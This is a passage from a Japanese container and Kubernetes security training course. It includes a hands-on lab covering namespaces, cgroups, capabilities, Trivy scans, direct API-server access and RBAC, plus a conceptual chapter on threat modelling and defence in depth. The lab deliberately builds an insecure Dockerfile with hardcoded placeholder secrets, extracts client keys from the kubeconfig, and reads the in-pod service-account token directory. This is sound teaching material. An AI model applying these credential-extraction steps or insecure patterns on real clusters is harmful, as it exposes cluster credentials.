[2.1.2 検出された問題の分析](#212-検出された問題の分析) 19 | - [2.2 Kubernetes APIサーバーへの直接アクセス](#22-kubernetes-apiサーバーへの直接アクセス) 20 | - [2.2.1 APIサーバーの情報取得](#221-apiサーバーの情報取得) 21 | - [2.2.2 認証なしでのアクセス試行](#222-認証なしでのアクセス試行) 22 | - [2.2.3 証明書を使用した認証](#223-証明書を使用した認証) 23 | - [2.3 Kubernetes認可(RBAC)の理解](#23-kubernetes認可rbacの理解) 24 | - [2.3.1 現在のユーザー権限の確認](#231-現在のユーザー権限の確認) 25 | - [2.3.2 制限されたServiceAccountの作成](#232-制限されたserviceaccountの作成) 26 | - [2.3.3 カスタムRoleの作成と権限制御](#233-カスタムroleの作成と権限制御) 27 | - [2.3.4 名前空間を跨いだ権限の確認](#234-名前空間を跨いだ権限の確認) 28 | - [2.3.5 権限のないアクセスの確認](#235-権限のないアクセスの確認) 29 | - [2.3.6 クリーンアップ](#236-クリーンアップ) 30 | - [次のステップ](#次のステップ) 31 | 32 | 33 | 本演習では、クラウドネイティブセキュリティの基盤となるコンテナとKubernetesのセキュリティ機能を実際に体験し、理解を深めます。 34 | 35 | ## 目標 36 | 37 | - コンテナの要素技術(namespace, cgroup, capabilities)を理解する 38 | - Dockerfileのセキュリティベストプラクティスを学習する 39 | - Kubernetesクラスタのセキュリティ状態を評価する方法を習得する 40 | - Kubernetes APIサーバーの認証・認可の仕組みを理解する 41 | 42 | --- 43 | 44 | ## 0 事前準備 45 | 46 | 作業ディレクトリを作成し、ディレクトリ内でファイル作成等の作業をしてください。 47 | 48 | ```bash 49 | mkdir -p /root//02 50 | cd /root//02 51 | ``` 52 | 53 | ## 1. コンテナセキュリティ 54 | 55 | ### 1.1 コンテナの要素技術を理解する 56 | 57 | コンテナの基盤となるLinuxの機能(namespace, cgroup, capabilities)を実際に確認してみましょう。 58 | 59 | #### 1.1.1 Namespaceの確認 60 | 61 | **ホストのnamespaceを確認** 62 | 63 | ```bash 64 | # 現在のnamespaceを確認 65 | ls -la /proc/$$/ns/ 66 | ``` 67 | 68 | **unshareコマンドで新しいnamespaceを作成** 69 | 70 | ```bash 71 | # PIDとネットワークnamespaceを分離した環境を作成 72 | sudo unshare --pid --net --fork --mount-proc bash 73 | 74 | # 新しいnamespace内でプロセスを確認 75 | ps aux 76 | # → PID 1として新しいbashプロセスが表示されることを確認 77 | 78 | # ネットワークインターフェースを確認 79 | ip addr show 80 | # → loopbackインターフェースのみが表示されることを確認 81 | 82 | exit 83 | ``` 84 | 85 | **コンテナ内でのnamespace確認** 86 | 87 | ```bash 88 | # コンテナを起動してnamespaceを確認 89 | docker run -it --rm alpine:latest sh 90 | 91 | # コンテナ内でプロセスを確認 92 | ps aux 93 | 94 | # ネットワークを確認 95 | ip addr show 96 | 97 | # namespaceを確認 98 | ls -la /proc/1/ns/ 99 | 100 | exit 101 | 102 | # ホストのnamespaceと比較 103 | ls -la /proc/$$/ns/ 104 | ``` 105 | 106 | #### 1.1.2 Cgroupの確認 107 | 108 | **cgroupの制限を確認** 109 | 110 | ```bash 111 | # メモリ制限を設定してコンテナを起動 112 | docker run -it --rm --memory=128m alpine:latest sh 113 | 114 | # コンテナ内でメモリ制限を確認 115 | cat /sys/fs/cgroup/memory.max 116 | 117 | exit 118 | 119 | # CPU制限を設定してコンテナを起動(別ターミナル) 120 | docker run -it --rm --cpus=0.5 alpine:latest sh 121 | 122 | # CPU制限を確認 123 | cat /sys/fs/cgroup/cpu.max 124 | # の形式で表示される 125 | # quota / period = 0.5 (50%制限) となることを確認 126 | 127 | exit 128 | ``` 129 | 130 | **リソース制限の動作確認** 131 | 132 | ```bash 133 | # メモリを大量消費するプロセスを実行 134 | docker run --memory=64m --rm alpine:latest sh -c "apk add --no-cache python3; python3 -c 'x = b\"a\" * 1024 * 1024 * 80'" 135 | # → メモリ制限によりプロセスが停止することを確認 136 | dmesg 137 | ``` 138 | 139 | #### 1.1.3 Capabilitiesの確認 140 | 141 | **デフォルトのcapabilitiesを確認** 142 | 143 | ```bash 144 | # 通常のコンテナでcapabilitiesを確認 145 | docker run -it --rm alpine:latest sh -c "apk add --no-cache libcap && capsh --print" | grep sys_admin 146 | 147 | # 特権コンテナでcapabilitiesを確認 148 | docker run -it --rm --privileged alpine:latest sh -c "apk add --no-cache libcap && capsh --print" | grep sys_admin 149 | ``` 150 | 151 | **特定のcapabilityを追加/削除** 152 | 153 | ```bash 154 | # NET_ADMINを追加してネットワーク設定を変更 155 | docker run -it --rm alpine:latest sh -c "ip link add dummy0 type dummy && ip link show dummy0" 156 | docker run -it --rm --cap-add=NET_ADMIN alpine:latest sh -c "ip link add dummy0 type dummy && ip link show dummy0" 157 | 158 | # CHOWNを削除 159 | docker run -it --rm alpine:latest sh -c "touch /tmp/test && chown nobody /tmp/test" 2>&1 160 | docker run -it --rm --cap-drop=CHOWN alpine:latest sh -c "touch /tmp/test && chown nobody /tmp/test" 2>&1 161 | ``` 162 | 163 | ### 1.2 Dockerfileセキュリティスキャン 164 | 165 | #### 1.2.1 セキュアでないDockerfileの作成 166 | 167 | まず、セキュリティ上の問題を含むDockerfileを作成します。 168 | 169 | ```bash 170 | cat << 'EOF' > Dockerfile.insecure 171 | FROM ubuntu:latest 172 | 173 | # rootユーザーでアプリケーションを実行 174 | USER root 175 | 176 | # 不要なパッケージをインストール 177 | RUN apt-get update && apt-get install -y \ 178 | curl \ 179 | wget \ 180 | telnet \ 181 | ftp \ 182 | vim \ 183 | git \ 184 | && rm -rf /var/lib/apt/lists/* 185 | 186 | # 機密情報をハードコード 187 | ENV API_KEY=sk-1234567890abcdef 188 | ENV DATABASE_PASSWORD=secret123 189 | 190 | # 広範囲のポートを公開 191 | EXPOSE 22 80 443 3306 5432 192 | 193 | # rootでアプリケーションを実行 194 | CMD ["sleep", "infinity"] 195 | EOF 196 | ``` 197 | 198 | #### 1.2.2 Trivyを使用したDockerfileスキャン 199 | 200 | ```bash 201 | # Dockerfileの設定不備をスキャン 202 | trivy config Dockerfile.insecure 203 | ``` 204 | 205 | #### 1.2.3 セキュアなDockerfileの作成 206 | 207 | 検出された問題を修正したDockerfileを作成します。 208 | 209 | ```bash 210 | cat << 'EOF' > Dockerfile.secure 211 | # 具体的なバージョンを指定 212 | FROM ubuntu:22.04 213 | 214 | # セキュリティパッチを適用 215 | RUN apt-get update && apt-get install -y --no-install-recommends \ 216 | curl \ 217 | ca-certificates \ 218 | && rm -rf /var/lib/apt/lists/* \ 219 | && apt-get clean 220 | 221 | # 非root ユーザーを作成 222 | RUN groupadd -r appgroup && useradd -r -g appgroup -s /bin/false appuser 223 | 224 | # アプリケーションディレクトリを作成 225 | WORKDIR /app 226 | 227 | # ファイルの所有者を設定 228 | COPY --chown=appuser:appgroup . . 229 | 230 | # 必要なポートのみ公開 231 | EXPOSE 8080 232 | 233 | # 非rootユーザーに変更 234 | USER appuser 235 | 236 | # アプリケーションを実行 237 | CMD ["sleep", "infinity"] 238 | EOF 239 | ``` 240 | 241 | ```bash 242 | # 修正後のDockerfileをスキャン 243 | trivy config Dockerfile.secure 244 | ``` 245 | 246 | ## 2. Kubernetesセキュリティ 247 | 248 | ### 2.1 Kubernetesクラスタのセキュリティスキャン 249 | 250 | #### 2.1.1 Trivyを使用したクラスタスキャン 251 | 252 | ```bash 253 | # クラスタ全体のセキュリティ設定をスキャン 254 | trivy k8s --tolerations node-role.kubernetes.io/control-plane=:NoSchedule --report summary --timeout=1h 255 | 256 | # 特定のNamespaceをスキャン 257 | trivy k8s --include-namespaces kube-system --tolerations node-role.kubernetes.io/control-plane=:NoSchedule --report summary --timeout=1h 258 | 259 | # より詳細な結果を出力(ファイルサイズが非常に大きくなるため注意) 260 | trivy k8s --tolerations node-role.kubernetes.io/control-plane=:NoSchedule --report all --timeout=1h > cluster-security-report.txt 261 | 262 | # 結果を確認 263 | cat cluster-security-report.txt 264 | ``` 265 | 266 | #### 2.1.2 検出された問題の分析 267 | 268 | ```bash 269 | # CISベンチマークに基づく検証 270 | trivy k8s --compliance=k8s-cis-1.23 --tolerations node-role.kubernetes.io/control-plane=:NoSchedule --report summary 271 | 272 | # Pod Security Standards(Baseline)に基づく検証 273 | trivy k8s --compliance=k8s-pss-baseline-0.1 --tolerations node-role.kubernetes.io/control-plane=:NoSchedule --report summary 274 | ``` 275 | 276 | ### 2.2 Kubernetes APIサーバーへの直接アクセス 277 | 278 | kubectlを使わずに、直接APIサーバーにアクセスして認証・認可の仕組みを理解します。 279 | 280 | #### 2.2.1 APIサーバーの情報取得 281 | 282 | ```bash 283 | # APIサーバーのエンドポイントを確認 284 | kubectl cluster-info 285 | 286 | # APIサーバーのURLを変数に設定(適宜修正) 287 | export API_SERVER=$(kubectl cluster-info | grep "Kubernetes control plane" | awk '{print $7}') 288 | echo "API Server: $API_SERVER" 289 | ``` 290 | 291 | #### 2.2.2 認証なしでのアクセス試行 292 | 293 | ```bash 294 | # 認証なしでAPIサーバーにアクセス(403が返される) 295 | curl -k $API_SERVER/api/v1/pods 296 | ``` 297 | 298 | #### 2.2.3 証明書を使用した認証 299 | 300 | ```bash 301 | # kubeconfigの内容を表示 302 | kubectl config view --raw 303 | 304 | # kubeconfigからクライアント証明書とキーを抽出 305 | kubectl config view --raw -o jsonpath='{.users[0].user.client-certificate-data}' | base64 -d > kube-client.crt 306 | kubectl config view --raw -o jsonpath='{.users[0].user.client-key-data}' | base64 -d > kube-client.key 307 | kubectl config view --raw -o jsonpath='{.clusters[0].cluster.certificate-authority-data}' | base64 -d > kube-ca.crt 308 | 309 | # 証明書を使用してAPIサーバーにアクセス 310 | curl --cert kube-client.crt \ 311 | --key kube-client.key \ 312 | --cacert kube-ca.crt \ 313 | $API_SERVER/api/v1/namespaces 314 | 315 | # Podの一覧を取得 316 | curl --cert kube-client.crt \ 317 | --key kube-client.key \ 318 | --cacert kube-ca.crt \ 319 | $API_SERVER/api/v1/pods 320 | ``` 321 | 322 | ### 2.3 Kubernetes認可(RBAC)の理解 323 | 324 | Kubernetesの認可機能であるRBACの動作を実際に確認し、最小権限の原則について学習します。 325 | 326 | #### 2.3.1 現在のユーザー権限の確認 327 | 328 | ```bash 329 | # 現在のユーザーで実行可能な操作を確認 330 | kubectl auth can-i get pods 331 | kubectl auth can-i create pods 332 | kubectl auth can-i delete pods 333 | kubectl auth can-i get secrets -n kube-system 334 | 335 | # すべての権限を一覧表示 336 | kubectl auth can-i --list 337 | 338 | # 特定のNamespaceでの権限を確認 339 | kubectl auth can-i --list -n kube-system 340 | ``` 341 | 342 | #### 2.3.2 制限されたServiceAccountの作成 343 | 344 | ```bash 345 | # 制限されたServiceAccountを作成 346 | kubectl create serviceaccount limited-sa 347 | 348 | # 現在のServiceAccountの権限を確認(権限なし) 349 | kubectl auth can-i get pods --as=system:serviceaccount:default:limited-sa 350 | 351 | # view権限のみを付与するRoleBindingを作成 352 | kubectl create rolebinding limited-binding \ 353 | --clusterrole=view \ 354 | --serviceaccount=default:limited-sa 355 | 356 | # 権限付与後の確認 357 | kubectl auth can-i get pods --as=system:serviceaccount:default:limited-sa 358 | kubectl auth can-i create pods --as=system:serviceaccount:default:limited-sa 359 | kubectl auth can-i delete pods --as=system:serviceaccount:default:limited-sa 360 | ``` 361 | 362 | #### 2.3.3 カスタムRoleの作成と権限制御 363 | 364 | ```bash 365 | # Pod読み取り専用のRoleを作成 366 | kubectl create role pod-reader \ 367 | --verb=get,list,watch \ 368 | --resource=pods 369 | 370 | # ServiceAccountにカスタムRoleを割り当て 371 | kubectl create serviceaccount custom-sa 372 | kubectl create rolebinding custom-binding \ 373 | --role=pod-reader \ 374 | --serviceaccount=default:custom-sa 375 | 376 | # カスタムRoleの権限を確認 377 | kubectl auth can-i get pods --as=system:serviceaccount:default:custom-sa 378 | kubectl auth can-i create pods --as=system:serviceaccount:default:custom-sa 379 | kubectl auth can-i get services --as=system:serviceaccount:default:custom-sa 380 | 381 | # 権限の詳細を確認 382 | kubectl auth can-i --list --as=system:serviceaccount:default:custom-sa 383 | ``` 384 | 385 | #### 2.3.4 名前空間を跨いだ権限の確認 386 | 387 | ```bash 388 | # test Namespaceを作成 389 | kubectl create namespace test 390 | 391 | # defaultのみで有効なRoleBindingの動作確認 392 | kubectl auth can-i get pods --as=system:serviceaccount:default:custom-sa -n default 393 | kubectl auth can-i get pods --as=system:serviceaccount:default:custom-sa -n test 394 | 395 | # クラスター全体で有効なClusterRoleBindingを作成 396 | kubectl create clusterrolebinding cluster-pod-reader \ 397 | --clusterrole=view \ 398 | --serviceaccount=default:cluster-sa 399 | 400 | kubectl create serviceaccount cluster-sa 401 | 402 | # 異なるNamespaceでの権限を確認 403 | kubectl auth can-i get pods --as=system:serviceaccount:default:cluster-sa -n default 404 | kubectl auth can-i get pods --as=system:serviceaccount:default:cluster-sa -n test 405 | kubectl auth can-i get pods --as=system:serviceaccount:default:cluster-sa -n kube-system 406 | ``` 407 | 408 | #### 2.3.5 権限のないアクセスの確認 409 | 410 | ```bash 411 | # 権限のないリソースへのアクセスを試行 412 | kubectl auth can-i create secrets --as=system:serviceaccount:default:limited-sa 413 | kubectl auth can-i delete nodes --as=system:serviceaccount:default:limited-sa 414 | 415 | # 実際にPodを作成して権限制限を確認 416 | cat << EOF > test-pod.yaml 417 | apiVersion: v1 418 | kind: Pod 419 | metadata: 420 | name: test-rbac-pod 421 | spec: 422 | serviceAccountName: limited-sa 423 | containers: 424 | - name: test 425 | image: alpine:latest 426 | command: ["sleep", "3600"] 427 | EOF 428 | 429 | kubectl apply -f test-pod.yaml 430 | 431 | # Podにexec 432 | kubectl exec -it test-rbac-pod -- /bin/sh 433 | 434 | # Pod内からkubectl操作を試行 435 | wget -qO /tmp/kubectl https://dl.k8s.io/release/v1.33.3/bin/linux/amd64/kubectl 436 | chmod +x /tmp/kubectl 437 | /tmp/kubectl get pods 438 | /tmp/kubectl auth whoami 439 | 440 | # ServiceAccountの認証情報 441 | ls /var/run/secrets/kubernetes.io/serviceaccount/ 442 | 443 | exit 444 | ``` 445 | 446 | #### 2.3.6 クリーンアップ 447 | 448 | ```bash 449 | # 作成したリソースを削除 450 | kubectl delete pod test-rbac-pod --ignore-not-found 451 | kubectl delete serviceaccount limited-sa custom-sa cluster-sa --ignore-not-found 452 | kubectl delete rolebinding limited-binding custom-binding --ignore-not-found 453 | kubectl delete clusterrolebinding cluster-pod-reader --ignore-not-found 454 | kubectl delete role pod-reader --ignore-not-found 455 | kubectl delete namespace test --ignore-not-found 456 | ``` 457 | 458 | --- 459 | 460 | ## 次のステップ 461 | 462 | 演習完了後、[3章 セキュリティアセスメント](../03_security_assessment/README.md) に進みます。 463 | -------------------------------------------------------------------------------- /03_security_assessment/README.md: -------------------------------------------------------------------------------- 1 | # 3章 セキュリティアセスメント 2 | 3 | - [3章 セキュリティアセスメント](#3章-セキュリティアセスメント) 4 | - [1. ルールベースとリスクベースのセキュリティアプローチ](#1-ルールベースとリスクベースのセキュリティアプローチ) 5 | - [1.1. ルールベースセキュリティとは](#11-ルールベースセキュリティとは) 6 | - [1.2. リスクベースセキュリティとは](#12-リスクベースセキュリティとは) 7 | - [1.3. Kubernetesおよびクラウドネイティブ環境における適用性](#13-kubernetesおよびクラウドネイティブ環境における適用性) 8 | - [1.4. ルールベース vs リスクベースセキュリティ](#14-ルールベース-vs-リスクベースセキュリティ) 9 | - [2. クラウドネイティブプラットフォームのための脅威モデリング](#2-クラウドネイティブプラットフォームのための脅威モデリング) 10 | - [2.1. 脅威モデリングとは](#21-脅威モデリングとは) 11 | - [2.2. STRIDE脅威モデル](#22-stride脅威モデル) 12 | - [2.3. 攻撃対象領域とデータフローの脆弱性を特定する手法](#23-攻撃対象領域とデータフローの脆弱性を特定する手法) 13 | - [3. 多層防御(Defense-in-Depth)の実装](#3-多層防御defense-in-depthの実装) 14 | - [3.2. Kubernetes内のセキュリティ層の図示](#32-kubernetes内のセキュリティ層の図示) 15 | - [3.3. 各層の多様なセキュリティ制御を統合するための戦略](#33-各層の多様なセキュリティ制御を統合するための戦略) 16 | - [4. セキュリティ対策の費用対効果](#4-セキュリティ対策の費用対効果) 17 | - [4.1. セキュリティ投資と組織目標およびリスク許容度のバランス](#41-セキュリティ投資と組織目標およびリスク許容度のバランス) 18 | - [4.2. セキュリティ価値の定量化とリソース配分の最適化](#42-セキュリティ価値の定量化とリソース配分の最適化) 19 | - [4.3. クラウドネイティブにおけるセキュリティ投資収益率(ROSI)](#43-クラウドネイティブにおけるセキュリティ投資収益率rosi) 20 | - [次のステップ](#次のステップ) 21 | 22 | 23 | 本章では、クラウドネイティブ環境のセキュリティを強化する上で、システムのセキュリティ状態を評価し、具体的な対策を決定するための考え方やフレームワークをご紹介します。 24 | 25 | ## 1. ルールベースとリスクベースのセキュリティアプローチ 26 | 27 | ### 1.1. ルールベースセキュリティとは 28 | 29 | ルールベースセキュリティは、事前定義された標準、ポリシー、規制、またはベストプラクティスへの準拠に焦点を当てたアプローチです。これは、確立されたルールへの準拠を確実にすることに関わります。このアプローチは、GDPRやHIPAAなどの規制要件、PCI DSSなどの業界標準、または組織内部のポリシーによって推進されることがよくあります。 30 | 31 | **主な特徴:** 32 | - **コンプライアンス駆動:** 主な目標は、特定の義務を満たすことです。 33 | - **チェックリスト指向:** 一連のルールやコントロールに対する準拠を検証することを含みます。 34 | - **静的/反応的:** 既知の構成に対する定期的な監査やスキャンを伴うことが多いです。 35 | - **例:** KubernetesのCISベンチマーク、NISTガイドライン、内部セキュリティベースライン、Policy as Codeによる自動ポリシー適用。 36 | 37 | Policy as Codeは、動的な環境においてもルールベースのコントロールをより効果的かつ一貫性のあるものにするメカニズムとして機能します。 38 | 39 | ### 1.2. リスクベースセキュリティとは 40 | 41 | リスクベースセキュリティは、潜在的な影響と可能性に基づいて、実際の脅威と脆弱性を特定、評価、および軽減することに焦点を当てたアプローチです。これは、何が問題になりうるか、それがどれくらい起こりそうか、そしてその結果がどれほど深刻になるかを理解することに関わります。このアプローチは、組織のリスクを削減する上で最も大きな影響を与える場所にセキュリティ投資を優先させます。 42 | 43 | **主な特徴:** 44 | - **脅威中心:** 潜在的な攻撃ベクトルと攻撃者を特定し、理解することに焦点を当てます。 45 | - **プロアクティブ/適応的:** 潜在的な損害を予測し防止することを目指し、進化する脅威に適応します。 46 | - **優先順位付け:** 最も重要なリスクに最初に対処するためにリソースを向けます。 47 | - **例:** 脅威モデリング、脆弱性管理、ペネトレーションテスト、インシデント対応計画。 48 | 49 | リスクベースアプローチのメリットには、優先順位付け、リソースの最適化、およびビジネス目標との整合性があります。 50 | 51 | ### 1.3. Kubernetesおよびクラウドネイティブ環境における適用性 52 | 53 | **ルールベースセキュリティの適用:** 54 | - **Pros:** Kubernetes環境において、ベースラインのセキュリティ体制を確立するために不可欠です。例えば、コントロールプレーンとワーカーノードを強化するためのCIS Kubernetesベンチマークは、初期評価の強力な指標となります。OPA GatekeeperやKyvernoのようなPolicy as Codeツールは、アドミッションコントロールでルールを強制し、すべての新しいデプロイメントがセキュリティ標準(例:特権コンテナなし、必須リソース制限)に準拠することを保証できます。 55 | - **Cons:** コンプライアンスはセキュリティとイコールではありません。システムがすべてのルールに完全に準拠していても、ルールでカバーされていない新しい攻撃や誤設定に対して脆弱である可能性があります。クラウドネイティブの動的な性質は、静的なルールセットがすぐに陳腐化する可能性があることを意味します。 56 | 57 | **リスクベースセキュリティの適用:** 58 | - **Pros:** 複雑な分散システムにおける固有のリスクを特定するのに非常に効果的です。脅威モデリングは、マイクロサービス間の相互作用、API露出、Kubernetes内のデータフローに特有の脆弱性を明らかにするのに役立ちます。これにより、開発スピードをできるだけ損なわず、実際のビジネス影響に基づいて修復作業を優先させることができます。 59 | - **Cons:** 脅威と脆弱性を正確に評価するためには深い専門知識が必要です。特に大規模で急速に進化する環境では、リソース集約的になる可能性があります。リスク評価における主観性が一貫性の欠如につながる可能性があります。 60 | 61 | 「コンプライアンスはセキュリティとイコールではない」という指摘は、純粋なルールベースアプローチの主なデメリットと、リスクベース思考の必要性を強調しています。セキュリティとアジリティのバランスを取ることは、クラウドネイティブ環境で効果的にリスクベースセキュリティを適用する上での重要な課題です。 62 | 63 | ルールベースセキュリティは、ベースラインや規制遵守に必要不可欠ですが、それだけでは不十分です。リスクベースセキュリティは、実際の脅威に対処するために必要な深さを提供します。動的なクラウドネイティブ環境では、純粋に静的なルールベースアプローチでは新たな脅威を見逃す可能性があります。したがって、最も効果的な戦略は、両者の融合です。ルールベースのアプローチを自動化されたベースラインの強制とコンプライアンスに使用し、リスクベースの手法(脅威モデリングなど)を適用して、ルールではカバーできない固有の、文脈に応じた脅威を特定し、軽減します。このアプローチは、組織が自動化されたポリシー強制ツールと、高度な脅威分析を実行できる熟練したセキュリティ専門家の両方に投資する必要があることを意味します。また、セキュリティ体制管理は、ルールと進化するリスクプロファイルの両方に対する継続的な評価を含むべきであることも示唆しています。 64 | 65 | ### 1.4. ルールベース vs リスクベースセキュリティ 66 | 67 | | 基準 | ルールベースセキュリティ | リスクベースセキュリティ | 68 | | :--- | :--- | :--- | 69 | | **定義** | 事前定義された標準、ポリシー、規制への準拠に焦点を当てる。 | 潜在的な脅威、脆弱性、その影響と可能性に基づいて評価し軽減する。 | 70 | | **主な目標** | コンプライアンスの達成、ベースラインセキュリティの確立。 | 組織のリスクを削減し、ビジネス目標と整合させる。 | 71 | | **推進要因** | 規制要件、業界標準、内部ポリシー。 | ビジネス目標、潜在的な損害、脅威インテリジェンス。 | 72 | | **焦点** | チェックリスト、コントロール、静的構成。 | 脅威、脆弱性、影響、可能性。 | 73 | | **アプローチ** | 静的、反応的、監査とスキャン。 | プロアクティブ、適応的、優先順位付け。 | 74 | | **主要な活動** | コンプライアンス監査、Policy as Code、ベンチマーク適用。 | 脅威モデリング、脆弱性管理、ペネトレーションテスト、インシデント対応計画。 | 75 | | **メリット** | 明確な基準、自動化しやすい、規制遵守を支援。 | 実際の脅威に焦点を当てる、リソースの最適化、ビジネス目標との整合。 | 76 | | **デメリット** | コンプライアンスがセキュリティとイコールではない、新しい脅威を見逃す可能性がある、動的な環境では陳腐化しやすい。 | 専門知識が必要、リソース集約的、リスク評価に主観性が入り込む可能性がある。 | 77 | | **クラウドネイティブでの関連性 (例)** | CIS Kubernetesベンチマーク、OPA Gatekeeperによるポリシー強制。 | マイクロサービス間の脅威モデリング、APIセキュリティ評価。 | 78 | 79 | ## 2. クラウドネイティブプラットフォームのための脅威モデリング 80 | 81 | ### 2.1. 脅威モデリングとは 82 | 83 | 脅威モデリングとは、システムをデプロイする前に、システムに対する既知の脅威とその緩和策を熟慮し、特定し、文書化するプロセスです。脅威のモデル化は、すべてのシステムのデプロイメントの前、その最中、完了後にさまざまな脅威に直面することを認識し、セキュリティ専門家がこれらの脅威を事前に識別して緩和するのに役立ちます。 84 | 85 | - **プロアクティブなセキュリティ:** 開発ライフサイクルの早い段階で問題を発見し(シフトレフト)、修復コストを削減します。 86 | - **包括的なシステムの理解:** データフロー、信頼境界、攻撃対象領域を含む、システムのセキュリティ体制の全体像を提供します。 87 | - **優先順位付け:** 最も重要な脅威にセキュリティの取り組みを集中させるのに役立ちます。 88 | - **設計の改善:** セキュリティを最初から組み込むことで、より安全なシステムアーキテクチャにつながります。 89 | 90 | ### 2.2. STRIDE脅威モデル 91 | 92 | 脅威モデリングにはいくつかの手法がありますが、ここでは「STRIDE」という広く使用されている脅威モデルに焦点を当てます。STRIDEは、脅威を以下の6つのカテゴリに分類するものです。 93 | 94 | - **S**poofing (なりすまし): 攻撃者が他のユーザーやシステムになりすますこと。 95 | - **T**ampering (改ざん): データやシステムの設定を不正に変更すること。 96 | - **R**epudiation (否認): 攻撃者が自身の行動を後から否定すること。 97 | - **I**nformation Disclosure (情報漏洩): 機密情報が不正に公開されること。 98 | - **D**enial of Service (サービス拒否): システムを過負荷にして、正しく機能させなくすること。 99 | - **E**levation of Privilege (権限昇格): 攻撃者が本来持っていない高い権限を獲得すること。 100 | 101 | **Kubernetes環境におけるSTRIDEの活用:** 102 | 103 | Kubernetes環境のアーキテクチャにSTRIDEを適用することで、システム固有の脅威を特定できます。 104 | 105 | 例: 106 | 107 | - **Kubernetes APIサーバー:** 108 | - **なりすまし/権限昇格:** 攻撃者が管理者になりすまして、Kubernetesクラスタを操作しようとする脅威。 109 | - **サービス拒否:** APIサーバーに大量のリクエストを送りつけ、サービスの運用を停止させる脅威。 110 | - **etcd(Kubernetesの設定情報を保存するデータストア):** 111 | - **情報漏洩:** etcdに保存されている機密情報(データベース接続パスワードなど)が不正に漏洩する脅威。 112 | - **改ざん:** etcdの設定が不正に変更され、システムが誤動作する脅威。 113 | - **アプリケーションのマイクロサービス(Frontend, Backend API, Databaseなど):** 114 | - **なりすまし:** あるマイクロサービスが別のサービスになりすまして通信する脅威。 115 | - **改ざん:** サービス間の通信中にデータが不正に変更される脅威。 116 | - **情報漏洩:** データベースから機密情報が不正に取得される脅威。 117 | - **サービス拒否:** 特定のマイクロサービスが過負荷になり、サービス全体が利用できなくなる脅威。 118 | 119 | ### 2.3. 攻撃対象領域とデータフローの脆弱性を特定する手法 120 | 121 | 効果的な脅威モデリングには、システムのアーキテクチャと相互作用の深い理解が必要です。以下のような手法を用いて、対象システムの潜在的な弱点を特定することができます。 122 | 123 | - **データフロー図 (DFD):** 対象システムのコンポーネント(Frontend, Backend API, Database, Ingress Controllerなど)間でデータがどのように移動するかを視覚化し、信頼境界と外部エンティティを特定します。これにより、データの流れの中でセキュリティ対策が必要なポイントを洗い出せます。 124 | - **攻撃対象領域の列挙:** 攻撃者が対象システムと相互作用できるすべてのポイントを特定します。Kubernetesの場合、これには以下が含まれます。 125 | - **Kubernetes APIサーバー:** 公開されたエンドポイント、認証/認可メカニズム。 126 | - **コンテナイメージ:** アプリケーションのコンテナイメージに含まれるベースイメージ、アプリケーションコード、サードパーティライブラリの脆弱性。 127 | - **ネットワークポリシー:** Pod間の通信において、意図しないネットワークアクセスにつながる誤設定。 128 | - **RBAC構成:** Kubernetesクラスタ内で、過剰な特権を持つロールやサービスアカウント。 129 | - **シークレット管理:** データベースパスワードやAPIキーなどの機密データが安全に管理されていないこと。 130 | - **外部統合:** CI/CDパイプライン、監視システム、クラウドプロバイダーAPIなど、外部システムとの連携ポイント。 131 | - **信頼境界分析:** システム内で信頼レベルが変化する場所(例:外部ユーザーとIngress Controller間、Frontend PodとBackend API Pod間、異なる名前空間間)を特定します。 132 | 133 | 脅威モデリングは一度限りの活動ではなく、継続的なプロセスとしてDevSecOpsに統合されるべきです。システムは常に変化しているため、一度作成された脅威モデルはすぐに陳腐化します。したがって、脅威モデリングは静的なドキュメントとしてではなく、開発プロセスに組み込まれた継続的な活動であるべきです。
134 | この継続的な活動を実現するために、脅威モデリングプロセスの一部を自動化すること(例:一般的な誤設定をスキャンするツールの使用、またはインフラの変更に基づくDFDの自動更新)は有効な手段です。また、システムが進化するにつれてモデルを定期的に見直すことも重要です。このアプローチは、セキュリティチームが開発チームと密接に連携し、脅威モデリングのプラクティスを日常のワークフローに組み込むことを可能にします。クラウドネイティブのアジリティに対応するには、Threat Modeling as Codeへと移行し、CI/CDパイプラインを活用して、脅威の発見と検証を効率的に行うツールも重要になります。 135 | 136 | ## 3. 多層防御(Defense-in-Depth)の実装 137 | 138 | 多層防御は、システムを保護するために複数のセキュリティ制御層を展開する基本的なセキュリティ戦略です。この考え方は、ある層が失敗しても、別の層が保護を提供し、攻撃者が費やす労力を大幅に増加させるというものです。Kubernetesのような複雑で分散された世界では、このアプローチは特に有益です。対象システムに多層防御の考え方を適用し、各層でどのような対策を講じるべきかを検討する必要があります。 139 | 140 | 「スイスチーズモデル」は多層防御の有効性を説明するリスク管理モデルです。各チーズの薄切りには穴(脆弱性)がありますが、複数の薄切りを重ねることで、単一の視線(攻撃経路)がすべての穴を通過する可能性が低くなります。クラウドネイティブでは、これは基盤となるインフラストラクチャからアプリケーションコード自体に至るまで、すべてのコンポーネントと相互作用を保護することを意味します。 141 | 142 | ### 3.2. Kubernetes内のセキュリティ層の図示 143 | 144 | Kubernetesは、本質的に多層的なセキュリティアプローチをサポートしており、さまざまなレベルで制御が可能です。以下は、階層による整理の一例です。 145 | 146 | - **クラウドプロバイダー/インフラ層:** 147 | - **制御:** ネットワークセグメンテーション(VPC、サブネット)、クラウドリソースのIAM、ワーカーノードのホスト強化、基盤ストレージの暗号化。 148 | - **検討ポイント:** 対象システムが稼働するクラウド環境におけるVPC設定、IAMロールの最小権限化、ワーカーノードのOS強化、永続ボリュームの暗号化など。 149 | - **関連性:** 最も基本的な層です。ここが侵害されると、その上のすべての層が危険にさらされます。 150 | 151 | - **Kubernetesコントロールプレーン層:** 152 | - **コンポーネント:** APIサーバー、etcd、コントローラーマネージャー、スケジューラー。 153 | - **制御:** APIサーバーの強力な認証/認可(RBAC)、etcdの暗号化とアクセス制御、コントロールプレーンコンポーネントの安全な構成(例:CIS Kubernetesベンチマーク)。 154 | - **検討ポイント:** KubernetesクラスタのAPIサーバーへのアクセス制御(RBACの適切な設定)、etcdデータの暗号化、コントロールプレーンコンポーネントのセキュリティ設定強化。 155 | - **関連性:** クラスタの司令塔です。ここを保護することは最重要です。 156 | 157 | - **ネットワーク層:** 158 | - **コンポーネント:** Pod間通信、Ingress/Egress。 159 | - **制御:** Pod/名前空間間のトラフィックを制限するKubernetesネットワークポリシー、mTLSときめ細かいトラフィック制御のためのサービスメッシュ(例:Istio)、ネットワークセグメンテーション。 160 | - **検討ポイント:** アプリケーションのPod間の通信を制限するネットワークポリシーの導入、サービスメッシュによる相互認証通信の検討。 161 | - **関連性:** 横方向の移動を制限し、最小特権の通信を強制します(ゼロトラスト)。 162 | 163 | - **ホスト/ノード層:** 